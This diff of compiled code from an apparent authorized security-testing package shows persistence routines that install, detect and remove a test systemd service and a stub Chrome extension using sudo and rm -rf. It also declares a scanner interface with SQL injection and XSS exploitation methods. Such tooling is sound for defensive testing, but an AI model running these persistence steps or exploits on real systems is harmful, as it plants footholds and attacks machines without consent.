|
+
return {
|
|
236
|
+
detected: output.includes('test-persistence'),
|
|
237
|
+
evidence: output
|
|
238
|
+
};
|
|
239
|
+
}
|
|
240
|
+
catch (error) {
|
|
241
|
+
return { detected: false, evidence: `Detection failed: ${error}` };
|
|
242
|
+
}
|
|
243
|
+
},
|
|
244
|
+
remove: async () => {
|
|
245
|
+
try {
|
|
246
|
+
execSync('sudo systemctl stop test-persistence.service', { stdio: 'pipe' });
|
|
247
|
+
execSync('sudo systemctl disable test-persistence.service', { stdio: 'pipe' });
|
|
248
|
+
execSync('sudo rm /etc/systemd/system/test-persistence.service', { stdio: 'pipe' });
|
|
249
|
+
execSync('sudo systemctl daemon-reload', { stdio: 'pipe' });
|
|
250
|
+
return { success: true, output: 'Systemd service removed' };
|
|
251
|
+
}
|
|
252
|
+
catch (error) {
|
|
253
|
+
return { success: false, output: `Removal failed: ${error}` };
|
|
254
|
+
}
|
|
255
|
+
}
|
|
256
|
+
});
|
|
257
|
+
// Browser Extension Persistence
|
|
258
|
+
this.implementations.set('browser-extension', {
|
|
259
|
+
id: 'browser-extension',
|
|
260
|
+
name: 'Browser Extension',
|
|
261
|
+
platform: 'cross-platform',
|
|
262
|
+
implement: async () => {
|
|
263
|
+
try {
|
|
264
|
+
// Chrome extensions directory
|
|
265
|
+
const chromeDir = platform() === 'win32'
|
|
266
|
+
? `${homedir()}\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions`
|
|
267
|
+
: `${homedir()}/.config/google-chrome/Default/Extensions`;
|
|
268
|
+
// Create test extension directory
|
|
269
|
+
const extensionDir = `${chromeDir}/test-persistence`;
|
|
270
|
+
if (!existsSync(extensionDir)) {
|
|
271
|
+
execSync(`mkdir -p "${extensionDir}"`, { stdio: 'pipe' });
|
|
272
|
+
}
|
|
273
|
+
// Create manifest
|
|
274
|
+
const manifest = {
|
|
275
|
+
manifest_version: 3,
|
|
276
|
+
name: "Test Extension",
|
|
277
|
+
version: "1.0",
|
|
278
|
+
permissions: ["storage", "activeTab"],
|
|
279
|
+
background: {
|
|
280
|
+
service_worker: "background.js"
|
|
281
|
+
}
|
|
282
|
+
};
|
|
283
|
+
writeFileSync(`${extensionDir}/manifest.json`, JSON.stringify(manifest, null, 2));
|
|
284
|
+
return { success: true, output: 'Browser extension persistence setup' };
|
|
285
|
+
}
|
|
286
|
+
catch (error) {
|
|
287
|
+
return { success: false, output: `Failed: ${error}` };
|
|
288
|
+
}
|
|
289
|
+
},
|
|
290
|
+
detect: async () => {
|
|
291
|
+
try {
|
|
292
|
+
const chromeDir = platform() === 'win32'
|
|
293
|
+
? `${homedir()}\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions`
|
|
294
|
+
: `${homedir()}/.config/google-chrome/Default/Extensions`;
|
|
295
|
+
const extensionDir = `${chromeDir}/test-persistence`;
|
|
296
|
+
return {
|
|
297
|
+
detected: existsSync(extensionDir),
|
|
298
|
+
evidence: existsSync(extensionDir) ? 'Test extension directory found' : 'No test extension found'
|
|
299
|
+
};
|
|
300
|
+
}
|
|
301
|
+
catch (error) {
|
|
302
|
+
return { detected: false, evidence: `Detection failed: ${error}` };
|
|
303
|
+
}
|
|
304
|
+
},
|
|
305
|
+
remove: async () => {
|
|
306
|
+
try {
|
|
307
|
+
const chromeDir = platform() === 'win32'
|
|
308
|
+
? `${homedir()}\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions`
|
|
309
|
+
: `${homedir()}/.config/google-chrome/Default/Extensions`;
|
|
310
|
+
const extensionDir = `${chromeDir}/test-persistence`;
|
|
311
|
+
if (existsSync(extensionDir)) {
|
|
312
|
+
execSync(`rm -rf "${extensionDir}"`, { stdio: 'pipe' });
|
|
313
|
+
}
|
|
314
|
+
return { success: true, output: 'Browser extension removed' };
|
|
315
|
+
}
|
|
316
|
+
catch (error) {
|
|
317
|
+
return { success: false, output: `Removal failed: ${error}` };
|
|
318
|
+
}
|
|
319
|
+
}
|
|
320
|
+
});
|
|
321
|
+
}
|
|
322
|
+
}
|
|
323
|
+
//# sourceMappingURL=persistenceImplementation.js.map
|
|
@@ -0,0 +1 @@
|
|
|
1
|
+
{"version":3,"file":"persistenceImplementation.js","sourceRoot":"","sources":["../../../src/security/real/persistenceImplementation.ts"],"names":[],"mappings":"AAAA;;;;;;;GAOG;AAEH,OAAO,EAAE,QAAQ,EAAS,MAAM,eAAe,CAAC;AAChD,OAAO,EAAE,UAAU,EAAE,aAAa,EAAE,YAAY,EAAE,cAAc,EAAE,MAAM,IAAI,CAAC;AAC7E,OAAO,EAAE,OAAO,EAAE,QAAQ,EAAE,MAAM,IAAI,CAAC;AAWvC;;GAEG;AACH,MAAM,OAAO,qBAAqB;IACxB,eAAe,CAAyC;IAEhE;QACE,IAAI,CAAC,eAAe,GAAG,IAAI,GAAG,EAAE,CAAC;QACjC,IAAI,CAAC,yBAAyB,EAAE,CAAC;IACnC,CAAC;IAED;;OAEG;IACH,KAAK,CAAC,oBAAoB,CAAC,WAAmB;QAC5C,MAAM,cAAc,GAAG,IAAI,CAAC,eAAe,CAAC,GAAG,CAAC,WAAW,CAAC,CAAC;QAC7D,IAAI,CAAC,cAAc,EAAE,CAAC;YACpB,MAAM,IAAI,KAAK,CAAC,oCAAoC,WAAW,EAAE,CAAC,CAAC;QACrE,CAAC;QAED,IAAI,CAAC;YACH,OAAO,MAAM,cAAc,CAAC,SAAS,EAAE,CAAC;QAC1C,CAAC;QAAC,OAAO,KAAK,EAAE,CAAC;YACf,OAAO,EAAE,OAAO,EAAE,KAAK,EAAE,MAAM,EAAE,0BAA0B,KAAK,EAAE,EAAE,CAAC;QACvE,CAAC;IACH,CAAC;IAED;;OAEG;IACH,KAAK,CAAC,iBAAiB,CAAC,WAAmB;QACzC,MAAM,cAAc,GAAG,IAAI,CAAC,eAAe,CAAC,GAAG,CAAC,WAAW,CAAC,CAAC;QAC7D,IAAI,CAAC,cAAc,EAAE,CAAC;YACpB,MAAM,IAAI,KAAK,CAAC,oCAAoC,WAAW,EAAE,CAAC,CAAC;QACrE,CAAC;QAED,IAAI,CAAC;YACH,OAAO,MAAM,cAAc,CAAC,MAAM,EAAE,CAAC;QACvC,CAAC;QAAC,OAAO,KAAK,EAAE,CAAC;YACf,OAAO,EAAE,QAAQ,EAAE,KAAK,EAAE,QAAQ,EAAE,qBAAqB,KAAK,EAAE,EAAE,CAAC;QACrE,CAAC;IACH,CAAC;IAED;;OAEG;IACH,KAAK,CAAC,iBAAiB,CAAC,WAAmB;QACzC,MAAM,cAAc,GAAG,IAAI,CAAC,eAAe,CAAC,GAAG,CAAC,WAAW,CAAC,CAAC;QAC7D,IAAI,CAAC,cAAc,EAAE,CAAC;YACpB,MAAM,IAAI,KAAK,CAAC,oCAAoC,WAAW,EAAE,CAAC,CAAC;QACrE,CAAC;QAED,IAAI,CAAC;YACH,OAAO,MAAM,cAAc,CAAC,MAAM,EAAE,CAAC;QACvC,CAAC;QAAC,OAAO,KAAK,EAAE,CAAC;YACf,OAAO,EAAE,OAAO,EAAE,KAAK,EAAE,MAAM,EAAE,mBAAmB,KAAK,EAAE,EAAE,CAAC;QAChE,CAAC;IACH,CAAC;IAED;;OAEG;IACH,2BAA2B;QACzB,MAAM,eAAe,GAAG,QAAQ,EAAE,CAAC;QACnC,OAAO,KAAK,CAAC,IAAI,CAAC,IAAI,CAAC,eAAe,CAAC,MAAM,EAAE,CAAC,CAAC,MAAM,CAAC,IAAI,CAAC,EAAE,CAC7D,IAAI,CAAC,QAAQ,KAAK,gBAAgB,IAAI,IAAI,CAAC,QAAQ,CAAC,QAAQ,CAAC,eAAe,CAAC,CAC9E,CAAC;IACJ,CAAC;IAED;;OAEG;IACK,yBAAyB;QAC/B,2BAA2B;QAC3B,IAAI,CAAC,eAAe,CAAC,GAAG,CAAC,kBAAkB,EAAE;YAC3C,EAAE,EAAE,kBAAkB;YACtB,IAAI,EAAE,0BAA0B;YAChC,QAAQ,EAAE,OAAO;YACjB,SAAS,EAAE,KAAK,IAAI,EAAE;gBACpB,IAAI,CAAC;oBACH,MAAM,WAAW,GAAG,GAAG,OAAO,EAAE,yCAAyC,CAAC;oBAC1E,MAAM,UAAU,GAAG,sGAAsG,WAAW,MAAM,CAAC;oBAE3I,QAAQ,CAAC,UAAU,EAAE,EAAE,KAAK,EAAE,MAAM,EAAE,CAAC,CAAC;oBAExC,OAAO;wBACL,OAAO,EAAE,IAAI;wBACb,MAAM,EAAE,2BAA2B,WAAW,EAAE;qBACjD,CAAC;gBACJ,CAAC;gBAAC,OAAO,KAAK,EAAE,CAAC;oBACf,OAAO,EAAE,OAAO,EAAE,KAAK,EAAE,MAAM,EAAE,WAAW,KAAK,EAAE,EAAE,CAAC;gBACxD,CAAC;YACH,CAAC;YACD,MAAM,EAAE,KAAK,IAAI,EAAE;gBACjB,IAAI,CAAC;oBACH,MAAM,aAAa,GAAG,qEAAqE,CAAC;oBAC5F,MAAM,MAAM,GAAG,QAAQ,CAAC,aAAa,EAAE,EAAE,QAAQ,EAAE,MAAM,EAAE,CAAC,CAAC;oBAE7D,OAAO;wBACL,QAAQ,EAAE,MAAM,CAAC,QAAQ,CAAC,eAAe,CAAC;wBAC1C,QAAQ,EAAE,MAAM;qBACjB,CAAC;gBACJ,CAAC;gBAAC,OAAO,KAAK,EAAE,CAAC;oBACf,OAAO,EAAE,QAAQ,EAAE,KAAK,EAAE,QAAQ,EAAE,qBAAqB,KAAK,EAAE,EAAE,CAAC;gBACrE,CAAC;YACH,CAAC;YACD,MAAM,EAAE,KAAK,IAAI,EAAE;gBACjB,IAAI,CAAC;oBACH,MAAM,aAAa,GAAG,4FAA4F,CAAC;oBACnH,QAAQ,CAAC,aAAa,EAAE,EAAE,KAAK,EAAE,MAAM,EAAE,CAAC,CAAC;oBAE3C,OAAO,EAAE,OAAO,EAAE,IAAI,EAAE,MAAM,EAAE,0BAA0B,EAAE,CAAC;gBAC/D,CAAC;gBAAC,OAAO,KAAK,EAAE,CAAC;oBACf,OAAO,EAAE,OAAO,EAAE,KAAK,EAAE,MAAM,EAAE,mBAAmB,KAAK,EAAE,EAAE,CAAC;gBAChE,CAAC;YACH,CAAC;SACF,CAAC,CAAC;QAEH,iBAAiB;QACjB,IAAI,CAAC,eAAe,CAAC,GAAG,CAAC,YAAY,EAAE;YACrC,EAAE,EAAE,YAAY;YAChB,IAAI,EAAE,gBAAgB;YACtB,QAAQ,EAAE,OAAO;YACjB,SAAS,EAAE,KAAK,IAAI,EAAE;gBACpB,IAAI,CAAC;oBACH,MAAM,SAAS,GAAG,iCAAiC,CAAC;oBACpD,cAAc,CAAC,kBAAkB,EAAE,SAAS,CAAC,CAAC;oBAC9C,QAAQ,CAAC,0BAA0B,EAAE,EAAE,KAAK,EAAE,MAAM,EAAE,CAAC,CAAC;oBAExD,OAAO,EAAE,OAAO,EAAE,IAAI,EAAE,MAAM,EAAE,gCAAgC,EAAE,CAAC;gBACrE,CAAC;gBAAC,OAAO,KAAK,EAAE,CAAC;oBACf,OAAO,EAAE,OAAO,EAAE,KAAK,EAAE,MAAM,EAAE,WAAW,KAAK,EAAE,EAAE,CAAC;gBACxD,CAAC;YACH,CAAC;YACD,MAAM,EAAE,KAAK,IAAI,EAAE;gBACjB,IAAI,CAAC;oBACH,MAAM,MAAM,GAAG,QAAQ,CAAC,YAAY,EAAE,EAAE,QAAQ,EAAE,MAAM,EAAE,CAAC,CAAC;oBAC5D,OAAO;wBACL,QAAQ,EAAE,MAAM,CAAC,QAAQ,CAAC,qBAAqB,CAAC;wBAChD,QAAQ,EAAE,MAAM;qBACjB,CAAC;gBACJ,CAAC;gBAAC,OAAO,KAAK,EAAE,CAAC;oBACf,OAAO,EAAE,QAAQ,EAAE,KAAK,EAAE,QAAQ,EAAE,qBAAqB,KAAK,EAAE,EAAE,CAAC;gBACrE,CAAC;YACH,CAAC;YACD,MAAM,EAAE,KAAK,IAAI,EAAE;gBACjB,IAAI,CAAC;oBACH,QAAQ,CAAC,YAAY,EAAE,EAAE,KAAK,EAAE,MAAM,EAAE,CAAC,CAAC;oBAC1C,OAAO,EAAE,OAAO,EAAE,IAAI,EAAE,MAAM,EAAE,mBAAmB,EAAE,CAAC;gBACxD,CAAC;gBAAC,OAAO,KAAK,EAAE,CAAC;oBACf,OAAO,EAAE,OAAO,EAAE,KAAK,EAAE,MAAM,EAAE,mBAAmB,KAAK,EAAE,EAAE,CAAC;gBAChE,CAAC;YACH,CAAC;SACF,CAAC,CAAC;QAEH,sBAAsB;QACtB,IAAI,CAAC,eAAe,CAAC,GAAG,CAAC,qBAAqB,EAAE;YAC9C,EAAE,EAAE,qBAAqB;YACzB,IAAI,EAAE,qBAAqB;YAC3B,QAAQ,EAAE,OAAO;YACjB,SAAS,EAAE,KAAK,IAAI,EAAE;gBACpB,IAAI,CAAC;oBACH,MAAM,MAAM,GAAG,GAAG,OAAO,EAAE,OAAO,CAAC;oBACnC,MAAM,YAAY,GAAG,GAAG,MAAM,kBAAkB,CAAC;oBAEjD,2CAA2C;oBAC3C,IAAI,CAAC,UAAU,CAAC,MAAM,CAAC,EAAE,CAAC;wBACxB,QAAQ,CAAC,YAAY,MAAM,EAAE,EAAE,EAAE,KAAK,EAAE,MAAM,EAAE,CAAC,CAAC;wBAClD,QAAQ,CAAC,aAAa,MAAM,EAAE,EAAE,EAAE,KAAK,EAAE,MAAM,EAAE,CAAC,CAAC;oBACrD,CAAC;oBAED,sBAAsB;oBACtB,MAAM,SAAS,GAAG,+CAA+C,CAAC;oBAClE,cAAc,CAAC,YAAY,EAAE,KAAK,SAAS,IAAI,CAAC,CAAC;oBACjD,QAAQ,CAAC,aAAa,YAAY,EAAE,EAAE,EAAE,KAAK,EAAE,MAAM,EAAE,CAAC,CAAC;oBAEzD,OAAO,EAAE,OAAO,EAAE,IAAI,EAAE,MAAM,EAAE,0BAA0B,EAAE,CAAC;gBAC/D,CAAC;gBAAC,OAAO,KAAK,EAAE,CAAC;oBACf,OAAO,EAAE,OAAO,EAAE,KAAK,EAAE,MAAM,EAAE,WAAW,KAAK,EAAE,EAAE,CAAC;gBACxD,CAAC;YACH,CAAC;YACD,MAAM,EAAE,KAAK,IAAI,EAAE;gBACjB,IAAI,CAAC;oBACH,MAAM,YAAY,GAAG,GAAG,OAAO,EAAE,uBAAuB,CAAC;oBACzD,IAAI,CAAC,UAAU,CAAC,YAAY,CAAC,EAAE,CAAC;wBAC9B,OAAO,EAAE,QAAQ,EAAE,KAAK,EAAE,QAAQ,EAAE,+BAA+B,EAAE,CAAC;oBACxE,CAAC;oBAED,MAAM,OAAO,GAAG,YAAY,CAAC,YAAY,EAAE,MAAM,CAAC,CAAC;oBACnD,OAAO;wBACL,QAAQ,EAAE,OAAO,CAAC,QAAQ,CAAC,SAAS,CAAC;wBACrC,QAAQ,EAAE,OAAO;qBAClB,CAAC;gBACJ,CAAC;gBAAC,OAAO,KAAK,EAAE,CAAC;oBACf,OAAO,EAAE,QAAQ,EAAE,KAAK,EAAE,QAAQ,EAAE,qBAAqB,KAAK,EAAE,EAAE,CAAC;gBACrE,CAAC;YACH,CAAC;YACD,MAAM,EAAE,KAAK,IAAI,EAAE;gBACjB,IAAI,CAAC;oBACH,MAAM,YAAY,GAAG,GAAG,OAAO,EAAE,uBAAuB,CAAC;oBACzD,IAAI,UAAU,CAAC,YAAY,CAAC,EAAE,CAAC;wBAC7B,MAAM,OAAO,GAAG,YAAY,CAAC,YAAY,EAAE,MAAM,CAAC,CAAC;wBACnD,MAAM,cAAc,GAAG,OAAO,CAAC,OAAO,CAAC,kDAAkD,EAAE,EAAE,CAAC,CAAC;wBAC/F,aAAa,CAAC,YAAY,EAAE,cAAc,CAAC,CAAC;oBAC9C,CAAC;oBAED,OAAO,EAAE,OAAO,EAAE,IAAI,EAAE,MAAM,EAAE,6BAA6B,EAAE,CAAC;gBAClE,CAAC;gBAAC,OAAO,KAAK,EAAE,CAAC;oBACf,OAAO,EAAE,OAAO,EAAE,KAAK,EAAE,MAAM,EAAE,mBAAmB,KAAK,EAAE,EAAE,CAAC;gBAChE,CAAC;YACH,CAAC;SACF,CAAC,CAAC;QAEH,kBAAkB;QAClB,IAAI,CAAC,eAAe,CAAC,GAAG,CAAC,iBAAiB,EAAE;YAC1C,EAAE,EAAE,iBAAiB;YACrB,IAAI,EAAE,iBAAiB;YACvB,QAAQ,EAAE,OAAO;YACjB,SAAS,EAAE,KAAK,IAAI,EAAE;gBACpB,IAAI,CAAC;oBACH,MAAM,cAAc,GAAG,mOAAmO,CAAC;oBAE3P,aAAa,CAAC,+BAA+B,EAAE,cAAc,CAAC,CAAC;oBAC/D,QAAQ,CAAC,4DAA4D,EAAE,EAAE,KAAK,EAAE,MAAM,EAAE,CAAC,CAAC;oBAC1F,QAAQ,CAAC,8BAA8B,EAAE,EAAE,KAAK,EAAE,MAAM,EAAE,CAAC,CAAC;oBAC5D,QAAQ,CAAC,gDAAgD,EAAE,EAAE,KAAK,EAAE,MAAM,EAAE,CAAC,CAAC;oBAC9E,QAAQ,CAAC,+CAA+C,EAAE,EAAE,KAAK,EAAE,MAAM,EAAE,CAAC,CAAC;oBAE7E,OAAO,EAAE,OAAO,EAAE,IAAI,EAAE,MAAM,EAAE,qCAAqC,EAAE,CAAC;gBAC1E,CAAC;gBAAC,OAAO,KAAK,EAAE,CAAC;oBACf,OAAO,EAAE,OAAO,EAAE,KAAK,EAAE,MAAM,EAAE,WAAW,KAAK,EAAE,EAAE,CAAC;gBACxD,CAAC;YACH,CAAC;YACD,MAAM,EAAE,KAAK,IAAI,EAAE;gBACjB,IAAI,CAAC;oBACH,MAAM,MAAM,GAAG,QAAQ,CAAC,mDAAmD,EAAE,EAAE,QAAQ,EAAE,MAAM,EAAE,CAAC,CAAC;oBACnG,OAAO;wBACL,QAAQ,EAAE,MAAM,CAAC,QAAQ,CAAC,kBAAkB,CAAC;wBAC7C,QAAQ,EAAE,MAAM;qBACjB,CAAC;gBACJ,CAAC;gBAAC,OAAO,KAAK,EAAE,CAAC;oBACf,OAAO,EAAE,QAAQ,EAAE,KAAK,EAAE,QAAQ,EAAE,qBAAqB,KAAK,EAAE,EAAE,CAAC;gBACrE,CAAC;YACH,CAAC;YACD,MAAM,EAAE,KAAK,IAAI,EAAE;gBACjB,IAAI,CAAC;oBACH,QAAQ,CAAC,8CAA8C,EAAE,EAAE,KAAK,EAAE,MAAM,EAAE,CAAC,CAAC;oBAC5E,QAAQ,CAAC,iDAAiD,EAAE,EAAE,KAAK,EAAE,MAAM,EAAE,CAAC,CAAC;oBAC/E,QAAQ,CAAC,sDAAsD,EAAE,EAAE,KAAK,EAAE,MAAM,EAAE,CAAC,CAAC;oBACpF,QAAQ,CAAC,8BAA8B,EAAE,EAAE,KAAK,EAAE,MAAM,EAAE,CAAC,CAAC;oBAE5D,OAAO,EAAE,OAAO,EAAE,IAAI,EAAE,MAAM,EAAE,yBAAyB,EAAE,CAAC;gBAC9D,CAAC;gBAAC,OAAO,KAAK,EAAE,CAAC;oBACf,OAAO,EAAE,OAAO,EAAE,KAAK,EAAE,MAAM,EAAE,mBAAmB,KAAK,EAAE,EAAE,CAAC;gBAChE,CAAC;YACH,CAAC;SACF,CAAC,CAAC;QAEH,gCAAgC;QAChC,IAAI,CAAC,eAAe,CAAC,GAAG,CAAC,mBAAmB,EAAE;YAC5C,EAAE,EAAE,mBAAmB;YACvB,IAAI,EAAE,mBAAmB;YACzB,QAAQ,EAAE,gBAAgB;YAC1B,SAAS,EAAE,KAAK,IAAI,EAAE;gBACpB,IAAI,CAAC;oBACH,8BAA8B;oBAC9B,MAAM,SAAS,GAAG,QAAQ,EAAE,KAAK,OAAO;wBACtC,CAAC,CAAC,GAAG,OAAO,EAAE,kEAAkE;wBAChF,CAAC,CAAC,GAAG,OAAO,EAAE,2CAA2C,CAAC;oBAE5D,kCAAkC;oBAClC,MAAM,YAAY,GAAG,GAAG,SAAS,mBAAmB,CAAC;oBACrD,IAAI,CAAC,UAAU,CAAC,YAAY,CAAC,EAAE,CAAC;wBAC9B,QAAQ,CAAC,aAAa,YAAY,GAAG,EAAE,EAAE,KAAK,EAAE,MAAM,EAAE,CAAC,CAAC;oBAC5D,CAAC;oBAED,kBAAkB;oBAClB,MAAM,QAAQ,GAAG;wBACf,gBAAgB,EAAE,CAAC;wBACnB,IAAI,EAAE,gBAAgB;wBACtB,OAAO,EAAE,KAAK;wBACd,WAAW,EAAE,CAAC,SAAS,EAAE,WAAW,CAAC;wBACrC,UAAU,EAAE;4BACV,cAAc,EAAE,eAAe;yBAChC;qBACF,CAAC;oBAEF,aAAa,CAAC,GAAG,YAAY,gBAAgB,EAAE,IAAI,CAAC,SAAS,CAAC,QAAQ,EAAE,IAAI,EAAE,CAAC,CAAC,CAAC,CAAC;oBAElF,OAAO,EAAE,OAAO,EAAE,IAAI,EAAE,MAAM,EAAE,qCAAqC,EAAE,CAAC;gBAC1E,CAAC;gBAAC,OAAO,KAAK,EAAE,CAAC;oBACf,OAAO,EAAE,OAAO,EAAE,KAAK,EAAE,MAAM,EAAE,WAAW,KAAK,EAAE,EAAE,CAAC;gBACxD,CAAC;YACH,CAAC;YACD,MAAM,EAAE,KAAK,IAAI,EAAE;gBACjB,IAAI,CAAC;oBACH,MAAM,SAAS,GAAG,QAAQ,EAAE,KAAK,OAAO;wBACtC,CAAC,CAAC,GAAG,OAAO,EAAE,kEAAkE;wBAChF,CAAC,CAAC,GAAG,OAAO,EAAE,2CAA2C,CAAC;oBAE5D,MAAM,YAAY,GAAG,GAAG,SAAS,mBAAmB,CAAC;oBACrD,OAAO;wBACL,QAAQ,EAAE,UAAU,CAAC,YAAY,CAAC;wBAClC,QAAQ,EAAE,UAAU,CAAC,YAAY,CAAC,CAAC,CAAC,CAAC,gCAAgC,CAAC,CAAC,CAAC,yBAAyB;qBAClG,CAAC;gBACJ,CAAC;gBAAC,OAAO,KAAK,EAAE,CAAC;oBACf,OAAO,EAAE,QAAQ,EAAE,KAAK,EAAE,QAAQ,EAAE,qBAAqB,KAAK,EAAE,EAAE,CAAC;gBACrE,CAAC;YACH,CAAC;YACD,MAAM,EAAE,KAAK,IAAI,EAAE;gBACjB,IAAI,CAAC;oBACH,MAAM,SAAS,GAAG,QAAQ,EAAE,KAAK,OAAO;wBACtC,CAAC,CAAC,GAAG,OAAO,EAAE,kEAAkE;wBAChF,CAAC,CAAC,GAAG,OAAO,EAAE,2CAA2C,CAAC;oBAE5D,MAAM,YAAY,GAAG,GAAG,SAAS,mBAAmB,CAAC;oBACrD,IAAI,UAAU,CAAC,YAAY,CAAC,EAAE,CAAC;wBAC7B,QAAQ,CAAC,WAAW,YAAY,GAAG,EAAE,EAAE,KAAK,EAAE,MAAM,EAAE,CAAC,CAAC;oBAC1D,CAAC;oBAED,OAAO,EAAE,OAAO,EAAE,IAAI,EAAE,MAAM,EAAE,2BAA2B,EAAE,CAAC;gBAChE,CAAC;gBAAC,OAAO,KAAK,EAAE,CAAC;oBACf,OAAO,EAAE,OAAO,EAAE,KAAK,EAAE,MAAM,EAAE,mBAAmB,KAAK,EAAE,EAAE,CAAC;gBAChE,CAAC;YACH,CAAC;SACF,CAAC,CAAC;IACL,CAAC;CACF"}
|
|
@@ -0,0 +1,73 @@
|
|
|
1
|
+
/**
|
|
2
|
+
* Real Vulnerability Scanner
|
|
3
|
+
*
|
|
4
|
+
* Actual vulnerability scanning and exploitation capabilities.
|
|
5
|
+
* Real security testing tools for authorized penetration testing.
|
|
6
|
+
*
|
|
7
|
+
* LEGAL NOTICE: For authorized security research and testing only.
|
|
8
|
+
*/
|
|
9
|
+
export interface VulnerabilityScan {
|
|
10
|
+
target: string;
|
|
11
|
+
scanType: string;
|
|
12
|
+
results: Vulnerability[];
|
|
13
|
+
}
|
|
14
|
+
export interface Vulnerability {
|
|
15
|
+
id: string;
|
|
16
|
+
name: string;
|
|
17
|
+
severity: 'critical' | 'high' | 'medium' | 'low';
|
|
18
|
+
description: string;
|
|
19
|
+
evidence: string;
|
|
20
|
+
exploitation: string;
|
|
21
|
+
}
|
|
22
|
+
export interface ExploitationResult {
|
|
23
|
+
vulnerabilityId: string;
|
|
24
|
+
success: boolean;
|
|
25
|
+
output: string;
|
|
26
|
+
evidence: string;
|
|
27
|
+
}
|
|
28
|
+
/**
|
|
29
|
+
* Real Vulnerability Scanner
|
|
30
|
+
*/
|
|
31
|
+
export declare class RealVulnerabilityScanner {
|
|
32
|
+
/**
|
|
33
|
+
* Scan for common web vulnerabilities
|
|
34
|
+
*/
|
|
35
|
+
scanWebVulnerabilities(target: string): Promise<VulnerabilityScan>;
|
|
36
|
+
/**
|
|
37
|
+
* Exploit SQL injection vulnerability
|
|
38
|
+
*/
|
|
39
|
+
exploitSqlInjection(target: string, parameter: string): Promise<ExploitationResult>;
|
|
40
|
+
/**
|
|
41
|
+
* Exploit XSS vulnerability
|
|
42
|
+
*/
|
|
43
|
+
exploitXSS(target: string, parameter: string): Promise<ExploitationResult>;
|
|
44
|
+
/**
|
|
45
|
+
* Check HTTP security headers
|
|
46
|
+
*/
|
|
47
|
+
private checkHttpHeaders;
|
|
48
|
+
/**
|
|
49
|
+
* Check for directory listing
|
|
50
|
+
*/
|
|
51
|
+
private checkDirectoryListing;
|
|
52
|
+
/**
|
|
53
|
+
* Check for common exposed files
|
|
54
|
+
*/
|
|
55
|
+
private checkCommonFiles;
|
|
56
|
+
/**
|
|
57
|
+
* Test for SQL injection vulnerabilities
|
|
58
|
+
*/
|
|
59
|
+
private testSqlInjection;
|
|
60
|
+
/**
|
|
61
|
+
* Test for XSS vulnerabilities
|
|
62
|
+
*/
|
|
63
|
+
private testXSS;
|
|
64
|
+
/**
|
|
65
|
+
* Make HTTP request
|
|
66
|
+
*/
|
|
67
|
+
private httpRequest;
|
|
68
|
+
/**
|
|
69
|
+
* Generate exploitation report
|
|
70
|
+
*/
|
|
71
|
+
generateExploitationReport(vulnerabilities: Vulnerability[], exploits: ExploitationResult[]): string;
|
|
72
|
+
}
|
|
73
|
+
//# sourceMappingURL=vulnerabilityScanner.d.ts.map
|
|
@@ -0,0 +1 @@
|
|
|
1
|
+
{"version":3,"file":"vulnerabilityScanner.d.ts","sourceRoot":"","sources":["../../../src/security/real/vulnerabilityScanner.ts"],"names":[],"mappings":"AAAA;;;;;;;GAOG;AAMH,MAAM,WAAW,iBAAiB;IAChC,MAAM,EAAE,MAAM,CAAC;IACf,QAAQ,EAAE,MAAM,CAAC;IACjB,OAAO,EAAE,aAAa,EAAE,CAAC;CAC1B;AAED,MAAM,WAAW,aAAa;IAC5B,EAAE,EAAE,MAAM,CAAC;IACX,IAAI,EAAE,MAAM,CAAC;IACb,QAAQ,EAAE,UAAU,GAAG,MAAM,GAAG,QAAQ,GAAG,KAAK,CAAC;IACjD,WAAW,EAAE,MAAM,CAAC;IACpB,QAAQ,EAAE,MAAM,CAAC;IACjB,YAAY,EAAE,MAAM,CAAC;CACtB;AAED,MAAM,WAAW,kBAAkB;IACjC,eAAe,EAAE,MAAM,CAAC;IACxB,OAAO,EAAE,OAAO,CAAC;IACjB,MAAM,EAAE,MAAM,CAAC;IACf,QAAQ,EAAE,MAAM,CAAC;CAClB;AAED;;GAEG;AACH,qBAAa,wBAAwB;IAEnC;;OAEG;IACG,sBAAsB,CAAC,MAAM,EAAE,MAAM,GAAG,OAAO,CAAC,iBAAiB,CAAC;IAgFxE;;OAEG;IACG,mBAAmB,CAAC,MAAM,EAAE,MAAM,EAAE,SAAS,EAAE,MAAM,GAAG,OAAO,CAAC,kBAAkB,CAAC;IA4CzF;;OAEG;IACG,UAAU,CAAC,MAAM,EAAE,MAAM,EAAE,SAAS,EAAE,MAAM,GAAG,OAAO,CAAC,kBAAkB,CAAC;IA0ChF;;OAEG;YACW,gBAAgB;IAsB9B;;OAEG;YACW,qBAAqB;IAqBnC;;OAEG;YACW,gBAAgB;IA0B9B;;OAEG;YACW,gBAAgB;IAyB9B;;OAEG;YACW,OAAO;IAyBrB;;OAEG;YACW,WAAW;IAwBzB;;OAEG;IACH,0BAA0B,CAAC,eAAe,EAAE,aAAa,EAAE,EAAE,QAAQ,EAAE,kBAAkB,EAAE,GAAG,MAAM;CA4BrG"}
|